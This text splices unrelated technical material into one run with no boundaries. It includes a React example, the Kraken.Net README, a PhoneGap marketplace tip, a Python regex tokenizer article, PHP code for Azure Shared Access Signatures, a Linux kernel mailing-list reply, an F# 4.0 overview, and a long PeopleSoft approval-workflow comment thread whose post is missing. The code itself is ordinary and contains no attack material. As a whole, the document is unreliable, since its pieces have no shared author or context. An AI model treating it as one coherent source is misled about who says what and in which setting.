On the next post: the technology used (Jamstack and the deploy process), how I did this inexpensive site, and what I use to write and maintain it.
-- moplin.
Examples.
import React, { Component } from 'react';
import { render } from 'react-dom';
import Hello from './Hello';
import './style.css';

class App extends Component {
  constructor() {
    super();
    this.state = { name: 'React' };
  }

  render() {
    return (
      <div>
        <Hello name={this.state.name} />
        <p>
          This is just a simple test from StackBlitz :). I will be embedding
          stuff this way.
        </p>
      </div>
    );
  }
}

render(<App />, document.getElementById('root'));
Kraken.Net
A .Net wrapper for the Kraken API as described on Kraken, including all features the API provides
Donations are greatly appreciated and a motivation to keep improving.

Installation
To get started with Kraken.Net, install the KrakenExchange.Net package from the NuGet server. In the NuGet package manager, type 'KrakenExchange.Net' in the search box and hit enter; the KrakenExchange.Net package should come up in the results. After selecting the package, you can choose on the right hand side in which projects in your solution the package should be installed. Alternatively, in the Package Manager Console, type

Install-Package KrakenExchange.Net

in the command line interface. This should install the latest version of the package in your project.

After doing either of the above steps you should now be ready to actually start using Kraken.Net.
Getting started
After installing, it's time to actually use it. To get started you have to add the Kraken.Net namespace: using Kraken.Net;

Kraken.Net provides two clients to interact with the Kraken API. The KrakenClient provides all rest API calls. The KrakenSocketClient provides functions to interact with the websocket provided by the Kraken API. Both clients are disposable and as such can be used in a using statement.
Release notes
Version 1.4.3 - 04 May 2021
- Added GetAvailableBalances endpoint
Version 1.4.2 - 28 Apr 2021
- Updated CryptoExchange.Net
Version 1.4.1 - 19 Apr 2021
- Fixed ICommonSymbol.CommonName implementation on KrakenSymbol
- Updated CryptoExchange.Net
Version 1.4.0 - 12 Apr 2021
- Added GetWithdrawInfo endpoint
- Added authenticated SubscribeToOrderUpdates and SubscribeToOwnTradeUpdates subscriptions on socket client
Version 1.3.2 - 30 Mar 2021
- Updated CryptoExchange.Net
Version 1.3.1 - 01 Mar 2021
- Added Nuget SymbolPackage
Version 1.3.0 - 01 Mar 2021
- Added config for deterministic build
- Updated CryptoExchange.Net
Version 1.2.3 - 22 Jan 2021
- Updated for ICommonKline
Version 1.2.2 - 14 Jan 2021
- Updated CryptoExchange.Net
Version 1.2.1 - 22 Dec 2020
- Added missing SetDefaultOptions for socket client
- Fixed symbol name check for ETH2.S/ETH
Version 1.2.0 - 21 Dec 2020
- Update CryptoExchange.Net
- Updated to latest IExchangeClient
Version 1.1.9 - 11 Dec 2020
- Updated CryptoExchange.Net
- Implemented IExchangeClient
Version 1.1.8 - 19 Nov 2020
- Updated CryptoExchange.Net
Version 1.1.7 - 09 Nov 2020
- Fix string values for order book checksum
Version 1.1.6 - 09 Nov 2020
- Fixed symbol validation
- Added string value properties to orderbook for checksum validation
Version 1.1.5 - 08 Oct 2020
- Fixed withdraw endpoint
Version 1.1.4 - 08 Oct 2020
- Added withdraw method
- Fix close timestamp orders
- Added OrderMin property on pair
- Updated CryptoExchange.Net
Version 1.1.3 - 28 Aug 2020
- Updated CryptoExchange.Net
Version 1.1.2 - 12 Aug 2020
- Updated CryptoExchange.Net
Version 1.1.1 - 21 Jul 2020
- Added checksum validation for KrakenSymbolOrderBook
Version 1.1.0 - 20 Jul 2020
- Added two-factor authentication support
Version 1.0.8 - 21 Jun 2020
- Updated CryptoExchange
Version 1.0.7 - 16 Jun 2020
- Fix for KrakenSymbolOrderBook
Version 1.0.6 - 07 Jun 2020
- Updated CryptoExchange.Net to fix order book desync
Version 1.0.5 - 03 Mar 2020
- Fixed since parameter in GetRecentTrades endpoint
Version 1.0.4 - 27 Jan 2020
- Updated CryptoExchange.Net
Version 1.0.3 - 12 Nov 2019
- Added TradingAgreement parameter for placing orders for German accounts
Version 1.0.2 - 24 Oct 2019
- Fixed order deserialization
Version 1.0.1 - 23 Oct 2019
- Fixed validation length symbols
Version 1.0.0 - 23 Oct 2019
- See CryptoExchange.Net 3.0 release notes
- Added input validation
- Added CancellationToken support to all requests
- Now using IEnumerable<> for collections
- Renamed Market -> Symbol
- Renamed GetAccountBalance -> GetBalances
Version 0.0.4 - 15 Oct 2019
- Fixed placing orders
- Fixed possible mismatch in stream subscriptions
Version 0.0.3 - 24 Sep 2019
- Added missing order type, added missing ledger transfer types
Version 0.0.2 - 10 Sep 2019
- Added missing SetDefaultOptions and SetApiCredentials methods
Version 0.0.1 - 29 Aug 2019
- Initial release
PhoneGap on WP7 Tip #7: Marketplace tricks
This is a quick follow up tip to the last one I posted about using Trial Mode with a PhoneGap application on Windows phone.
As I mentioned in that article, having your application available for users to try without laying out any money is a great way to grab them as a customer. But successfully converting them is about more than just limiting the functionality. It’s about driving your desired behaviors for them. This can be prompting them to download your app, review it (good reviews are another key marketing tool in the marketplace) or even seeing other apps published by you in the marketplace.
Fortunately, there is an easy way to do this through the Marketplace tasks that are available to us. We will add a way to call those relevant tasks from PhoneGap by using the Marketplace Plugin from the previous article.
Revisiting the code from the previous article, we need to make a few changes. First, add this statement at the top of the marketplace.cs file.
using Microsoft.Phone.Tasks;
Then, add a wrapper for the task to show the detail in the Marketplace for the current application using the MarketplaceDetailTask class.
public void showInMarketplace(string args)
{
    MarketplaceDetailTask _marketplaceDetailTask = new MarketplaceDetailTask();
    _marketplaceDetailTask.Show();
}
This does not return a result to the calling JavaScript code, so you don’t need the DispatchCommandResult call as in the previous article.
Next up, a JavaScript wrapper in the marketplace.js file.
marketplace.prototype.showInMarketplace = function () {
    var args = {};
    PhoneGap.exec(null, null, "Marketplace", "showInMarketplace", args);
};
A small change to the index.html page will let us provide the user with a way to quickly jump to the marketplace and buy the app.
function licenseCallback(isTrial) {
    if (isTrial) {
        licenseDiv.innerHTML = 'Trial mode, please <a onClick=window.plugins.marketplace.showInMarketplace();>buy me</a>!';
    } else {
        licenseDiv.innerHTML = 'Thanks for buying!';
    }
}
If you try this in the phone emulator, you’ll notice a few things. First of all, the marketplace entry won’t display and in fact you’ll get an error. That’s expected, as your app didn’t get installed on the emulator from the marketplace in the first place. Be assured it will certainly work once your app is published. Second, after you go to the marketplace and then press the back button to return to the app, you get prompted to simulate trial or full mode again. That’s not only expected, but by design. If a user upgrades to paid, when they come back to the app, we want to know then. Not when the app is restarted.
There are other useful marketplace functions, including:
- MarketplaceHubTask - Allows an application to launch the Windows Phone Marketplace client application.
- MarketplaceReviewTask - Allows an application to launch the Windows Phone Marketplace client application and display the review page for the specified product. This is an EXCELLENT way to encourage reviews, and good reviews are key to a prominent position in the marketplace!
- MarketplaceSearchTask - Allows an application to launch the Windows Phone Marketplace client application and display the search results from the specified search terms. You could search for other apps you’ve published by putting the app name or the publisher name in as a parameter to this call. Great for cross-selling, as in “Like this app? Try my others!”
It’s easy to leverage the trial mode and the marketplace API in your PhoneGap apps on Windows Phone to get more purchases!
Using Python's finditer for Lexical Analysis
Fredrik Lundh wrote a good article called Using Regular Expressions for Lexical Analysis which explains how to use Python regular expressions to read an input string and group characters into lexical units, or tokens. The author's first group of examples read in a simple expression, "b = 2 + a*10", and output strings classified as one of three token types: symbols (e.g. a and b), integer literals (e.g. 2 and 10), and operators (e.g. =, +, and *). His first three examples use the findall method and his fourth example uses the undocumented scanner method from the re module. Here is the example code from the fourth example. Note that the "1" in the first column of the results corresponds to the integer literals token group, "2" corresponds to the symbols group, and "3" to the operators group.
import re

expr = "b = 2 + a*10"
pos = 0
pattern = re.compile("\s*(?:(\d+)|(\w+)|(.))")
scan = pattern.scanner(expr)
while 1:
    m = scan.match()
    if not m:
        break
    print m.lastindex, repr(m.group(m.lastindex))
2 'b'
3 '='
1 '2'
3 '+'
2 'a'
3 '*'
1 '10'
Since this article was dated 2002, and the author was using Python 2.0, I wondered if this was the most current approach. The author notes that recent versions (i.e. version 2.2 or later) of Python allow you to use the finditer method, which uses an internal scanner object. Using finditer makes the example code much simpler. Here is Fredrik's example using finditer:
import re

expr = "b = 2 + a*10"
regex = re.compile("\s*(?:(\d+)|(\w+)|(.))")
for m in regex.finditer(expr):
    print m.lastindex, repr(m.group(m.lastindex))
Running it produces the same results as the original.
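On Python 3 (where print is a function), the same tokenizer can be written with named groups so that m.lastgroup reports the token type by name instead of the numeric m.lastindex. This is my own small adaptation of Fredrik's pattern, not code from the original article:

```python
import re

expr = "b = 2 + a*10"
# Named groups make the token type readable via m.lastgroup
# instead of the numeric m.lastindex used in the original.
pattern = re.compile(r"\s*(?:(?P<integer>\d+)|(?P<symbol>\w+)|(?P<operator>.))")

for m in pattern.finditer(expr):
    print(m.lastgroup, repr(m.group(m.lastgroup)))
```

The output pairs each token with its group name (symbol 'b', operator '=', integer '2', and so on), matching the original's numeric classification.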
A Shared Access Signature (SAS) is the primary means of authenticating a client when connecting to many Azure services. It is a (relatively) newer authentication scheme, replacing Access Control Service (ACS).
Even though SAS has been around for several years, the Azure SDK for PHP only supports ACS. There is an open issue to add SAS support to the SDK, but until that support is added, you will not be able to use the SDK if your Azure service does not have ACS enabled, and in the past few years, Microsoft has been defaulting services to not use ACS.
For a recent project, I needed to send messages to an Azure Service Bus queue from PHP code. My initial approach was to use the Azure SDK for PHP; unfortunately, the documentation did not make it clear that the SDK does not support SAS authentication.
I did not discover this fact until I tried authenticating in my code and received an error that the host mynamespace-sb.accesscontrol.windows.net could not be found.
The accesscontrol.windows.net indicates the SDK was trying to use ACS. I could have used a PowerShell command to enable ACS authentication for my Service Bus, but since Microsoft is encouraging SAS over ACS, I opted to create my own SAS routine for PHP.
I found .NET code for generating the token on MSDN, but one important factor when translating this code to PHP is that the .NET HttpUtility.UrlEncode function returns the hexadecimal encodings as lowercase letters (e.g. %2f) whereas PHP's urlencode uses uppercase letters (%2F). This doesn’t usually matter, but it does matter when using the output for a hashing function.
The following code will generate a Shared Access Signature that can be used with Service Bus (and probably other Azure services as well):
function lower_urlencode($str) {
return preg_replace_callback('/%[0-9A-F]{2}/',
function(array $matches) {
return strtolower($matches[0]);
}, urlencode($str));
}
function generateSharedAccessSignature($url, $policy, $key) {
$expiry = time() + 3600;
$encodedUrl = lower_urlencode($url);
$scope = $encodedUrl . "\n" . $expiry;
$signature = base64_encode(hash_hmac('sha256', $scope, $key, true));
return "SharedAccessSignature sig="
. lower_urlencode($signature)
. "&se=$expiry&skn=$policy&sr=$encodedUrl";
}
$url references the endpoint you are trying to access, so if you’re trying to post to a queue, it would be e.g.
$policy is the name of the Shared access policy you want to use. You configure these within the Azure portal:
So for example, if I’m trying to send a message to a queue, I could use the above sendmessage policy.
$key is the key associated with the policy; you can use either the primary or secondary key:
Use the string returned from the generateSharedAccessSignature function as the value for the Authorization HTTP header.
One of the great features of Azure platform services such as Service Bus is that they are not tightly coupled to the Microsoft stack. In this case, using the above code, it was easy to send messages to a Service Bus queue using PHP.
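The same algorithm ports readily to other languages. As a point of comparison, here is a hedged Python sketch of the token generation above; the function and parameter names are my own, and note that Python's urllib.parse.quote has the same uppercase-hex behavior that had to be worked around in PHP:

```python
import base64
import hashlib
import hmac
import re
import time
from urllib.parse import quote


def lower_urlencode(s):
    # urllib.parse.quote, like PHP's urlencode, emits uppercase hex
    # (%2F); the signed string must use the lowercase form.
    return re.sub(r"%[0-9A-F]{2}", lambda m: m.group(0).lower(),
                  quote(s, safe=""))


def generate_sas(url, policy, key, ttl=3600):
    # Mirrors the PHP generateSharedAccessSignature function above;
    # url, policy, and key carry the same meanings.
    expiry = int(time.time()) + ttl
    encoded_url = lower_urlencode(url)
    scope = "%s\n%d" % (encoded_url, expiry)
    signature = base64.b64encode(
        hmac.new(key.encode(), scope.encode(), hashlib.sha256).digest()
    ).decode()
    return ("SharedAccessSignature sig=%s&se=%d&skn=%s&sr=%s"
            % (lower_urlencode(signature), expiry, policy, encoded_url))
```

As in the PHP version, the returned string goes in the Authorization HTTP header; the endpoint URL and policy name in any call are placeholders for your own namespace configuration.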
On 05/18, Eric W. Biederman wrote:
>
> Oleg Nesterov <oleg@redhat.com> writes:
>
> >> I think there is something very compelling about your solution,
> >> we do need my bit about making the init process ignore SIGCHLD
> >> so all of init's children self reap.
> >
> > Not sure I understand. This can work with or without 3/3 which
> > changes zap_pid_ns_processes() to ignore SIGCHLD. And just in
> > case, I think 3/3 is fine.
>
> The only issue I see is that without 3/3 we might have processes that
> no one wait(2)s for and so will never have release_task called on.
>
> We do have the wait loop

Yes, and we need this loop anyway, even if SIGCHLD is ignored.
It is possible that we already have a EXIT_ZOMBIE child(s) when
zap_pid_ns_processes() runs.

> but I think there is a race possible there.

Hmm. I do not see any race, but perhaps I missed something.
I think we can trust -ECHILD, or do_wait() is buggy.

Hmm. But there is another (off-topic) problem, security_task_wait()
can return an error if there are some security policy problems...
OK, this shouldn't happen I hope.

> > And once again, this wait_event() + __wake_up_parent() is very
> > simple and straightforward, we can cleanup this code later if
> > needed.
>
> Yes, and it doesn't when you do an UNINTERRUPTIBLE sleep with
> an INTERRUPTIBLE wake up unless I misread the code.

Yes. So we need wait_event_interruptible() or __unhash_process()
should use __wake_up_sync_key(wait_chldexit).

> > Yes. This is the known oddity. We always notify the tracer if the
> > leader exits, even if !thread_group_empty(). But after that the
> > tracer can't detach, and it can't do do_wait(WEXITED).
> >
> > The problem is not that we can't "fix" this. Just any discussed
> > fix adds the subtle/incompatible user-visible change.
>
> Yes and that is nasty.

Agreed. ptrace API is nasty ;)

> and moving detach_pid so we don't have to be super careful about
> where we call task_active_pid_ns.

Yes, I was thinking about this change too,

> --- a/kernel/pid_namespace.c
> +++ b/kernel/pid_namespace.c
> @@ -189,6 +189,17 @@ void zap_pid_ns_processes(struct pid_namespace *pid_ns)
>  		rc = sys_wait4(-1, NULL, __WALL, NULL);
>  	} while (rc != -ECHILD);
>
> +	read_lock(&tasklist_lock);
> +	for (;;) {
> +		__set_current_state(TASK_INTERRUPTIBLE);
> +		if (list_empty(&current->children))
> +			break;
> +		read_unlock(&tasklist_lock);
> +		schedule();

OK, but then it makes sense to add clear_thread_flag(TIF_SIGPENDING)
before schedule, to avoid the busy-wait loop (like the sys_wait4 loop
does). Or simply use TASK_UNINTERRUPTIBLE, I do not think it is that
important to "fool" /proc/loadavg. But I am fine either way.

Maybe you can also add "ifdef CONFIG_PID_NS" into __unhash_process(),
but this is minor too.

Oleg.
While all of the recent news has been focused on C# and Windows 10, F# isn’t standing still. Along with Visual Studio 2015 RC is the latest version of F# 4.0.
The first thing that should be noted is that it is truly a community project. Of the 38 contributors, only a quarter of them have any affiliation with Microsoft. All work was done in the open on the F# GitHub site, which is also where they would like feedback to be directed.
This release brings numerous changes to both the language and the runtime as well as a few IDE enhancements. You can see the full list on the F# blog, so we’re just going to hit the highlights.
Metaprogramming Support
Metaprogramming in .NET via expression trees has been a very important feature since the introduction of LINQ in .NET 3.5. With F# 4.0, working with expression trees is becoming easier than ever.
If you tag an argument of type FSharp.Quotations.Expr with the ReflectedDefinition attribute, the call site automatically switches to call-by-name semantics. Previously you would have to quote the expression explicitly at the call site, as shown in expressions 1 and 2 below; expression 3 shows the new implicit form.
Test.Expression1 ( <@ x + 1 @> ) //typed expression
Test.Expression2 ( <@@ x + 1 @@> ) //untyped expression
Test.Expression3 ( x + 1 ) //typed expression with ReflectedDefinition attribute
By eliminating the burden of explicitly quoting expressions, libraries that use metaprogramming techniques become much easier to work with.
Improved Preprocessor Directives
Believe it or not, until now F# had very limited support for preprocessor directives. Boolean operations such as “#if TRACE || DEBUG” were not possible until this version. The work-around for F# 3 and earlier is to use nested #if statements to simulate “and” expressions and duplicated code for “or” expressions.
Units of Measure
When working on scientific or engineering applications, errors often occur due to mistakes in units. For example, you may have one measurement in inches and another in meters. Back in 1999 this kind of mistake caused the loss of the Mars Climate Orbiter, a 125 million dollar space probe.
F# eliminates this class of bug through a concept known as units of measure. Scalar values become unit measurements by appending values with suffixes such as “<cm>” or “<miles/hour>”. As the next line shows, even conversions between units are expressed in terms of units of measure.
let cmPerInch : float<cm/inch> = 2.54<cm/inch>
The new feature for F# 4 is the ability to use fractional exponents in a unit of measure expression. For example:
[<Measure>] type Jones = cm Hz^(1/2) / W
Inheritance from types with multiple generic interface instantiations
This is a tricky one to understand if you aren’t familiar with F# and a frustrating one if you are. To begin with, let us consider a class that represents hexadecimal numbers. In C#, you may wish to design this class to be comparable to both strings and integers.
public class Hexadecimal : IComparable<string>, IComparable<int>
Due to the complex nature of F#’s type inference, it was previously unable to express this class. Not only can you not define a type with multiple interfaces that only differ by the type argument, you can’t inherit from one that does so either.
F# 4 doesn’t completely solve this problem but it does provide a workaround. You can now create two classes, one for each interface, and then have the second class inherit from the first. The code is a little tedious, but it is occasionally necessary when working with C# based libraries.
Extension properties in Object Initializers
Extension properties, a feature much desired in C#, are already available in F#. With this release, extension properties can now be used in object initializers.
Removing the Microsoft Brand
Following a tradition that dates back to Visual Basic 7, the language specific namespaces for F# all start with “Microsoft.FSharp”. But with F# being more community driven than Microsoft owned, this no longer seems appropriate and the Microsoft brand is being phased out.
> In this vein, to keep F# code itself vendor- and platform-neutral, the leading “Microsoft.” can now be optionally omitted when referring to namespaces, modules, and types from the FSharp.Core runtime.
Performance Improvement: Non-structural Comparisons
By default, F# uses structural comparisons instead of a type's built-in operators such as op_Equality. While this makes performing complex data comparisons easy, performance can suffer.

When you desire the performance or semantics of the built-in comparison operators, you can now use “open NonStructuralComparison” to change the way operators such as = work. In one simple benchmark comparing DateTime objects in a loop, the performance improvement was over an order of magnitude.
Script Debugging
Prior to VS 2015, F# developers had to choose between using F#’s interactive mode and having full access to the debugger. With this feature, you can now right-click on an F# script and run it under the debugger, thus getting the best of both worlds.
Intelligent Rebuilds
In VS 2013 and earlier, there was no way for Visual Studio to detect when an F# project needed to be built. So instead, F# projects were always rebuilt even when nothing changed. By adding “up-to-date” support in VS 2015, developers no longer have to wait for projects to be needlessly built.
Other features include improved Intellisense, interop APIs for Option<T>, async workflow extensions for WebClient, and more.
65 comments:
Hi Jim,
I have tried using your code in my Program as Criteria , but its not working .
Thanks
@Pavan, can you elaborate? How do you know it isn't working? Are you getting an error message?
Jim - Thanks for your books and blog - solid stuff.
On a related note to this post, I have several step and path app package criteria working as expected. What I am struggling with is the 'definition criteria' for which i would expect a False return code to disable WF for the transaction assuming criteria is met. Now according to PBooks the definition criteria is 'used to determine which Definition ID is to be used to process the Approval'
So I am looking at either pointing to a definition that has no WF OR adding the criteria to every step...
Have you ever done something similar? Suggestion? Thanks in advance.
Jim - Following up on my own comment - Ii was able to continue researching and found oracle support ticket Is it Possible to Setup Approval Workflow to Work With Multiple Approval Definition IDs? [ID 1134294.1].
Essentially this boils down to the fact that you can have multiple definitions configured for each approval process - the logical path being active status, default definition and effective date. If you return a False code in the default it will continue to cycle through the the active definitions.
Thanks for letting me bounce the idea off of you, hopefully another reader finds this thread useful!
@Chris, thank you for sharing both the problem and resolution.
A "Well" developed work flow will allow definition criteria to select the right definition. I have, however, seen work flows that hard code the definition ID. Obviously, in that case, it won't cycle through the list of definitions. And, like you said, it iterates over the collection of definitions until it finds one that returns true.It is my experience that if none return true, it will fall silently... basically the case where there is no work flow.
Jim -
My current expectation is that returning False in from the approval definition criteria would bypass approval for the transaction as you stated. But this is not the case for me - a false return code continues to process the default definition...unless another definition is configured. Currently i have configured another definition that will always self-approve (or i can setup the second definition to bogus criteria) but it seems odd to have to configure this separately. Once i can come up for air, i will trace to find out why. Thanks again.
Chris
@Chris, what you are seeing is correct. If they all return false, then the default will be used. If there is no default, then there would be nothing to use.
Thanks again. What is your recommendation when in the following situation: IF the req has an origin of ONL then process WF else no workflow is required?
@Chris, I'm sure there are a dozen ways to solve this. Here are a couple that came to mind:
* self approve by having the approver user list return the logged in user.
* Auto approve in the OnProcessLaunch event.
Hi Jim:
I have a question related to AWE notifications for a specific event. Here is what I am encountering:
For the "Final Approval" event, I have configured three separate notifications to be generated -- all with the Participant = User List (different User Lists for each).
However, I have noticed that only the FIRST of the three notifications is being generated upon Final Approval. Is this an issue with how the AWE notifications execute or is there something that can be done within configuration to ensure delivery of all notifications?
Thanks!
@MattY, just to make sure I understand correctly... In the Transaction Configuration, do you have multiple rows with the same Event: "On Final Approval"? I can't say that I've tried that. I haven't looked into the code to see why it is behaving the way you described either. Perhaps there is an SQLExec in there to find rows by type rather than a loop? That would certainly behave the way you are describing. It would be nice if what you describe were supported. Perhaps an alternate method would be to create a query, app class, or SQL user list that combined all of three into a single user list? I'm sure you could make that work with an app class user list.
Thanks Jim. Yes - I have multiple rows in the Transaction Configuration for the same event.
The problem with combining the three different users into a single User List is that I have three different notifications that are being generated. Different content & different recipients for each.
We'll investigate to determine if we can incorporate a loop in the code so it will execute all the rows. Thx
Has anyone had success creating custom AWE Line Level Approval? I’m having trouble trying to get the OnLineApprove method to fire. I have header level working so I decided to dig deeper. I added the keys to the Xref table, Updated the Registry, Configured the Events, added the method to my event handler, and created a new Process Definition using line level (very simple “Always True”). I have seen OnProcessLaunch fire so my routing has begun. But when my approver hits the Approve button, it saves and nothing happens to the approval. Tracing it show that the method does not fire. How does the system know to fire the line level method vs the header level method? Any ideas are appreciated.
Thor
@Thor, I have not worked on line level approvals. You may want to post your question on the PeopleSoft General OTN Forum.
Thanks Jim, I just posted the question.
Hi Jim ,
First of all, let me tell you that your posts have been immensely helpful to all the peoplesoft developers out there. They are precise, to the point and very accurate. Thank You.
Now coming to my query....
How do we get the reference to step number in the “Check” method of App Package class which is used for evaluating the Step Criteria in a AWE transaction.
I need to run this criteria for all steps in advance when the user initially clicks on submit button.So I need something which tells me what is the step “Check ” method is currently evaluating …
In UserList Class, I am able to find the reference to Step Number by using this
/*get the current step*/
&nStepnbr = %This.step.step_nbr
I need something similar in Step Criteria App Package, i have tried numerous things but no use, kindly help me out .
@Kunal, a very good question. I do not know the answer off the top of my head. What I can't remember is the contents of the constructor &REC parameter and the check &bindRec parameter. You should print out the names of those records (log file or something). If the &bindRec has all of the header values, etc, then you could get a reference to the ApprovalManager which has an AppInst, stage and txn.
Please post back when you figure it out.
Jim,
Can we pass values to the class, like POI_ID? If yes, can you please elaborate.
Thanks
Jim,
Can we pass parameters to the definition criteria, or can we capture the non-key fields from the cross reference record? I need PO_ID. Is there any way? Please elaborate.
@Satish, short answer to both questions is "yes." You do this through one of the two records passed into the constructor or the check method. Unfortunately, I like I told @Kunal, I can't remember what those record variables contain. I wish I had documented that piece. I recommend printing the record names. From there, you can determine the SQL needed to investigate the transaction records or xref values.
Hi Jim,
I used the code from your book 'webservice enabling approvals' to update the approval status using sync service. When there are multiple approval steps (this is Requisition process), only first step gets approved whereas the subsequent steps are updated to skipped and the Requisition status is updated to approved.
When approved from the online page, it is routed to the next step/ approver just fine.
Any pointers for me on what to look for?
@Srini, Congratulations on getting the web service working! I have only done header level approvals and have not looked into the line level approvals API.
Hi Jim,
I am doing header level approval too. But when there are multiple approval steps, first step is approved and the second one's status turns to skipped.
Whereas if I approve from the online page, it gets routed to second step just fine. I am not understanding what am I doing differently when I call doapprove?
Hello Jim,
First of all many thanks for the blog. Secondly, I'm working on Line level AWE. I need some help.
Suppose I've 5 lines for approval. 3 of them for level 1 approval and other two will undergo level 1 approval followed by level 2 approval.
On the second level approval page, I want to show only the 2 lines that need approval and the approval status of these two in monitor. Not for all the 5.
Please help me how it can be achieved.
Thanks,
Saurav
@Saurav, I have no experience with line level approvals. I suggest you post your question on the PeopleSoft OTN Discussion Forum.
Hi JIM,
Auto-approve is not working in one of our client after upgrading the tools from 8.52 to 8.53.
My process has "Auto Approval" checkbox enabled and "self approval" for that particular step is enabled with "Always True" criteria.
It's a line level approval.
Can you please help me??
@Pavan, I suggest you log a support case with Oracle support for something like this.
Thanks for the reply Jim.. Few days back i was facing problem in Self-approval.. the code you shared in this blog was very helpful...Thanks a lot for that..
JIM,
Gone through Chapter 3 i.e Workflow configuration.. it is very informative :)
@pavan, I am very glad that you find this information and the book content useful.
Hi Jim, I have a small problem with my AWE. I have two steps in my awe. When user creates a request the AWE got triggered to the Step1 userlist and the Monitor Showed clearly Step1: Pending and Step2:Not routed.
Then I went and logged in as the Step1 user and approved. But this time it dint trigger the Worklist to the second step userlist.
The thread status for this transaction is still in P Pending. The stepstatus for the first step is in Pending and for the second step it is N Notrouted.
Below is a snippet of my AWE component savepostchange code. Please help me , Am I missing anything.
import HMAF_AWE:ApprovalsFactory;
import HMAF_AWE:INTERFACES:ILaunchManager;
import HMAF_AWE:INTERFACES:IApprovalManager;
import HMAF_AWE:INTERFACES:IStatusMonitor;
import HMAF_AWE:*;
/*Declare local and component object variables*/
Local HMAF_AWE:ApprovalsFactory &AprvFactory;
Local HMAF_AWE:INTERFACES:IApprovalManager &AprvMgr;
Component HMAF_AWE:INTERFACES:IStatusMonitor &Monitor;
Local HMAF_AWE:INTERFACES:ILaunchManager &LaunchMgr;
/*Declare variables*/
Component Record &HDR_REC;
Component string &AprvProcId, &strAction;
/*GetHeader Rec*/
&HDR_REC = GetRecord(Record.MYHEADERRECORD);
&prcs_name = "MYPROCESSID";
Local string &Transaction_Name = &prcs_name;
Local Record &EOTransRec = CreateRecord(Record.EO_TRANSACTIONS);
&EOTransRec.TRANSACTION_NAME.Value = &prcs_name;
&EOTransRec.SelectByKey();
&AprvProcId = &EOTransRec.PTAFPRCS_ID.Value;
/*Create Approvals Factory*/
&AprvFactory = create HMAF_AWE:ApprovalsFactory();
/*Create launch manager object*/
&LaunchMgr = &AprvFactory.getLaunchManager(&AprvProcId, &HDR_REC, %OperatorId);
rem &LaunchMgr.DoSubmit();
/* Submit approval process */
/* create approval manager object */
If &strAction = "P" Then
If &LaunchMgr.hasAppDef And
&LaunchMgr.submitEnabled Then
&LaunchMgr.DoSubmit();
End-If;
&AprvMgr = &AprvFactory.getApprovalManager(&AprvProcId, &HDR_REC, %OperatorId);
Else
&AprvMgr = &AprvFactory.getApprovalManager(&AprvProcId, &HDR_REC, %OperatorId);
&ActionTaken = True;
Evaluate &strAction
When "A"
&AprvMgr.DoApprove(&HDR_REC);
Break;
When "D"
&AprvMgr.DoDeny(&HDR_REC);
Break;
When "B"
&AprvMgr.DoPushback(&HDR_REC); /***Push back***/
Break;
When-Other
&ActionTaken = False;
End-Evaluate;
End-If;
I have both the steps correctly configured
@Saeem, I don't see anything wrong with your code. You may want to post your question on the PeopleSoft General Discussion OTN Forum.
Hi Jim,
Thank You very much for the speedy reply. I made it work and now the worklist got triggered to the Second Level also.
I missed this piece of code
/*****/
If &ActionTaken Then
&appInst = &AprvMgr.the_inst;
&Monitor = &AprvFactory.getStatusMonitor(&appInst, "D", Null);
&strAction = " ";
End-If;
/******?
But now a new problem has arisen. When I try to access the link for the second level approver, nothing is happening; the page is staying as it is. No action is happening, it's not taking me to the approval page.
But for the first level approval this worklist link worked and took me to the Appr component.
Can you please help me where I should debug. Or am I missing something.
Thank You
Hi Jim,
Am I missing any configuration. I have the following foursteps configured in the transaction:
Onfinal Denial.
Onfinal Approval.
Route for Approval
and On Process Launch.
Should I include OnStepComplete.
@Saeem, only implement the methods you are actually using. If you don't have logic in OnStepComplete, then you should not implement it.
Hi Jim,
I have a question regarding Escalation Notifications in AWE. Normally escalations are set at the Path Level in AWE (via 'Details' on the path). Is it possible to apply Escalations on a Step level?
Thanks,
Tom
@Tom, great question. Unfortunately, I don't know the answer. I suggest you ask it on the PeopleSoft General OTN Forum.
Hi Jim,
I have followed exact same steps for AWE as you suggested in Book. But i am stuck in error "Class extends another, but has no constructor." I am posting same code here:
import PTAF_CORE:DEFN:UserListBase;
class WebAsset_ApprUserList extends PTAF_CORE:Defn:UserListBase
method WebAsset_ApprUserList(&rec_ As Record);
method GetUsers(&aryPrevOpr_ As array of string, &thread_ As Record)
Returns array of string;
end-class;
rem %Super = create PTAF_CORE:DEFN:UserListBase(&rec_);
rem WebAsset_ApprUserList super= new &WebAsset_ApprUserList;
rem super = create PTAF_CORE:DEFN:UserListBase(&rec_);
rem create PTAF_CORE:DEFN:UserListBase(&rec_);
method WebAsset_ApprUserList
/+ &rec_ as Record +/
rem %Super = create PTAF_CORE:DEFN:UserListBase(&rec_);
%Super = create PTAF_CORE:DEFN:UserListBase(&rec_);
end-method;
method GetUsers
/+ &aryPrevOpr_ as Array of String, +/
/+ &thread_ as Record +/
/+ Returns Array of String +/
/+ Extends/implements PTAF_CORE:DEFN:UserListBase.GetUsers +/
Local array of string &oprid_arr = CreateArrayRept("", 0);
Local SQL &admin_sql = CreateSQL("SELECT ROLEUSER " | "FROM PSROLEUSER WHERE ROLENAME = 'Portal Administrator'");
Local string &oprid; Local number &counter = 1;
While &admin_sql.Fetch(&oprid)
If (Mod(&counter, 2) = 0) Then
&oprid_arr.Push(&oprid);
End-If;
&counter = &counter + 1;
End-While;
Return &oprid_arr;
end-method;
Is this a 9.1 or later application? If so, try using the EOAW classes instead of PTAF classes. PTAF were only in 9.0 applications. Oracle renamed the AWE classes in 9.1 to EOAW. Likewise, change all of your other configurations, etc, to use the EOAW versions (including tables).
hi Jim,
Its 9.0 application only for Campus solution but tools are on 8.53.
Does that make any effect on coding of AWE??
Also i searched for EOAW but there are no packages like this name.
That is correct. There is no EOAW in Campus 9.0. I do not have experience with AWE in Campus 9.0. I have heard of customers using it in 9.0 Campus. You might try posting your question on the PeopleSoft OTN General discussion forum. Be sure to note your app and tools release when you post your question.
This looks Great...
I wish to create 1 user List App package ,
I have 7 User lists L1,L2,L3,L4 the SQL is the same except the Code type
I noticed in 8.54 there is a new thing called User List Attributes
So my thought is One app Package and Based on the Attribute in the user list perform I can adjust what I need to get done..
My Question .. How Do I get User List Attributes for that specific User list... Or even if i figure out the tables how do I get the Userlist ID that it is running..
Thanks
Hi Jim,
Can you please help me with this problem. I have my AWE configured and everything is working perfect except for the AWE monitor.
In my AWE monitor I am not able to expand the Comments section. Nothing happens when I click on the Comments expand button.
Please Help
@Saeem, you may need to file a support case for that.
Hi Jim,
We are configuring AWE for Absence management and we have bit different requirement,
